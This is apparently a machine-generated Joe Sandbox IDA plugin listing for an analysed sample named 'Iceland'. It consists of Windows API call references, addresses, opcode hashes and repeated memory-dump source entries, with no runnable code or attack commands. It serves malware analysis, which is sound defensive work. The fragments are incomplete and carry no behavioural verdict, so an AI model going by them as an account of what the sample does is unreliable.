                                                                                                                                                                                                                                                                  • Part of subcall function 00A2327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A232DD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23205: RegisterWindowMessageW.USER32(00000004,?,00A22964), ref: 00A2325D
                                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A22A0A
                                                                                                                                                                                                                                                                • OleInitialize.OLE32 ref: 00A22A28
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 00A63A0D
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                • Opcode ID: fcb812385904a303df8b2dbe19b8c72f7764a601f8287eb52a69dd5a8bae1a0c
                                                                                                                                                                                                                                                                • Instruction ID: 53194e6aa0be38a7348f46c29694993a315b73d68eb7153e025b9d67656a344a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fcb812385904a303df8b2dbe19b8c72f7764a601f8287eb52a69dd5a8bae1a0c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50719CB09522058F9798EFF9AE657753AE4FB48345740423AE108C73B2EB784447DF94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A261A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A26299
                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 00A3FD36
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A3FD45
                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A7FE33
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                • Opcode ID: 1a1ecfbf02f8bc510284eec35c08a7d330c61ec8364069068c5df20ba0a7d056
                                                                                                                                                                                                                                                                • Instruction ID: 55ea5e4aa0c864362b1f921df5bc27929ac1edc79b273be18caef0eb02c979e1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a1ecfbf02f8bc510284eec35c08a7d330c61ec8364069068c5df20ba0a7d056
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7831C371904344AFEB32CF648C55BE6BBFCAB02308F0084AEE6DE97242D7745A85CB51
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,00A5894C,?,00AE9CE8,0000000C), ref: 00A58A84
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00A5894C,?,00AE9CE8,0000000C), ref: 00A58A8E
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00A58AB9
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                • Opcode ID: c439af55b2a32b28762209f15cab9b3c65afa1d4cfdd424a844352206ca0a4f6
                                                                                                                                                                                                                                                                • Instruction ID: 1a523581c67541a8e95ec738b0a75ada77d06bf78f47df74db9abec232311639
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c439af55b2a32b28762209f15cab9b3c65afa1d4cfdd424a844352206ca0a4f6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30016B32A051605AD6206374ED46B3E67457B857B6F2B065BFE14BB1D3DF388C894280
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00A597BA,FF8BC369,00000000,00000002,00000000), ref: 00A59744
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00A597BA,FF8BC369,00000000,00000002,00000000,?,00A55ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00A46F41), ref: 00A5974E
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00A59755
                                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                • Opcode ID: c79cb835c01edf9cdf5590c95122005d648a43269eecb2258becd7190ef12a18
                                                                                                                                                                                                                                                                • Instruction ID: b0d6eeae1fbfc9966ade40f01cd67e206a92d99daf60cc00f8e93b76d1c6a0b8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c79cb835c01edf9cdf5590c95122005d648a43269eecb2258becd7190ef12a18
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8012836620114EFCF059FA9EC05C6F7B29FB89331B24035AFC119B190EB309D418B90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00A2F27B
                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00A2F289
                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A2F29F
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00A2F2B1
                                                                                                                                                                                                                                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 00A732D8
                                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                • Opcode ID: 26da76d67ea83cac69a1d50afb52d597a04c16819ec2732739f617af0637af46
                                                                                                                                                                                                                                                                • Instruction ID: 0ee7af10e8cde0ad8f0722f2c28dd8b1fdf92436d64ff3d27dd793823393cd64
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26da76d67ea83cac69a1d50afb52d597a04c16819ec2732739f617af0637af46
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BF05E312043459BEB70CBE4DC89FEA77ACEB45300F108A28F209930D1EB709588DB26
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 00A33006
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                • String ID: CALL
                                                                                                                                                                                                                                                                • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                • Opcode ID: cc3ff2b6b5b466389545921036fd2d949e18456e99948cd52659cf2a990c1fd4
                                                                                                                                                                                                                                                                • Instruction ID: bd81e4087e419bc9ff638a5573a3860fcd21af67d1a945c5d601e3b068488a86
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc3ff2b6b5b466389545921036fd2d949e18456e99948cd52659cf2a990c1fd4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46228C716083019FDB14DF28C881B2ABBF1BF89354F24895DF59A8B3A2D771E941CB52
                                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 75264e4db9772e7df1c06bab6876ba715fe5b31c3185e467beeda36bb132d784
                                                                                                                                                                                                                                                                • Instruction ID: 89dbc3fc7a3cbac32296fb0c1592b994eb33c569af199056fab9423799bab3c8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75264e4db9772e7df1c06bab6876ba715fe5b31c3185e467beeda36bb132d784
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0532AA30A00615DFDB24DF68DD81BAEB7B4AF05314F14C569F91AAB2A1EB31ED40CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 00A6413B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A255D1,?,?,00A64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A25871
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A23A76
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                • String ID: X
                                                                                                                                                                                                                                                                • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A23A3C
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsThemeActive.UXTHEME ref: 00A2333D
                                                                                                                                                                                                                                                                  • Part of subcall function 00A232E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A232FB
                                                                                                                                                                                                                                                                  • Part of subcall function 00A232E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A23312
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00A23368,?), ref: 00A233BB
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00A23368,?), ref: 00A233CE
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00AF2418,00AF2400,?,?,?,?,?,?,00A23368,?), ref: 00A2343A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00AF2418,?,?,?,?,?,?,?,00A23368,?), ref: 00A234BB
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00A23377
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 00A2CEEE
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LoadString
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 5ef438f39e4151e32d51ce021b84924a7fa33237c67d49839c0d499fcaea379b
                                                                                                                                                                                                                                                                • Instruction ID: 6bf03a97ee046abadcc00e9f6599cdaf5743007199db0424eee21eb8ff763bd9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ef438f39e4151e32d51ce021b84924a7fa33237c67d49839c0d499fcaea379b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1251C679A00108AFDB10DFA8C945FE97BB1EFC5364F199168E8189B391D771ED42CB90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 00A8FCCE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BuffCharLower
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                • Opcode ID: 5943f98823b645ff7df64454dc28ca5da4fe3b9b881e14e3272ab1056767a607
                                                                                                                                                                                                                                                                • Instruction ID: 3ef4fc21527613e3f77866c1dbce4e315631a5c6bcbc99a9e10bc48940ed527f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5943f98823b645ff7df64454dc28ca5da4fe3b9b881e14e3272ab1056767a607
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7141B5B650020AAFCB11FFA8C9819AEB7B8EF44314B21453EEA16D7251EB70DE05CB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A2668B,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A2664A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A2665C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2663E: FreeLibrary.KERNEL32(00000000,?,?,00A2668B,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A2666E
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A266AB
                                                                                                                                                                                                                                                                  • Part of subcall function 00A26607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A65657,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A26610
                                                                                                                                                                                                                                                                  • Part of subcall function 00A26607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A26622
                                                                                                                                                                                                                                                                  • Part of subcall function 00A26607: FreeLibrary.KERNEL32(00000000,?,?,00A65657,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A26635
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                • Opcode ID: 17af632f1e5b3a0454577d3c7055f61ab7271547fc26edabb13c8ca7b6f90dcb
                                                                                                                                                                                                                                                                • Instruction ID: 66937eda906b60faf1862b0bf577c5f8e6fa1e5599f4f38344188f046f7a6594
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17af632f1e5b3a0454577d3c7055f61ab7271547fc26edabb13c8ca7b6f90dcb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8911E372601215AACF18AB78EA02FAD7BB5AF50710F10883DF542A61C2EE71DA05DB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __wsopen_s
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                • Opcode ID: c4703cff0ee22514fc8459cbdc5847a4baab8a5506385f018e39cbbe35828265
                                                                                                                                                                                                                                                                • Instruction ID: 6fbdf839c4f4e7d259fb5cedffcead1d318417a960d5ab3815ff6cf89935bb35
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4703cff0ee22514fc8459cbdc5847a4baab8a5506385f018e39cbbe35828265
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8611187590410AEFCB05DF98E94599A7BF4FF48310F114069FC09AB311DA31EA15CB65
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A54FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00A5319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00A55031
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A553DF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 614378929-0
                                                                                                                                                                                                                                                                • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                • Instruction ID: 7bf72b762535080854ac7ec107d088a54436437115cdfe9b4d5f1028dd5d33bf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65012B725003046BE3318F69D85195AFBE9FB853B1F25052DE98487280EA70A809C764
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00A9F987
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00A5319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00A55031
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00A46A79,?,0000015D,?,?,?,?,00A485B0,000000FF,00000000,?,?), ref: 00A53BC5
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __fread_nolock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A23963
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A23A76
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 541455249-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,00000000,?,00A60A84,?,?,00000000,?,00A60A84,00000000,0000000C), ref: 00A60737
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                • String ID:
